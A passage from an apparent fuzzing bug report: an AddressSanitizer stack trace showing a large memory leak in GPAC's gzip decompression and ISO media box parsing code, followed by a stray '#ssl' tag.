        #1 0x599d69 in gf_gz_decompress_payload /root/Desktop/gpac/src/utils/base_encoding.c:257:31
        #2 0x7dfc66 in gf_isom_box_parse_ex /root/Desktop/gpac/src/isomedia/box_funcs.c:170:9
        #3 0x7df29c in gf_isom_parse_root_box /root/Desktop/gpac/src/isomedia/box_funcs.c:38:8
    
    SUMMARY: AddressSanitizer: 1718844764 byte(s) leaked in 2 allocation(s).

Tag

#ssl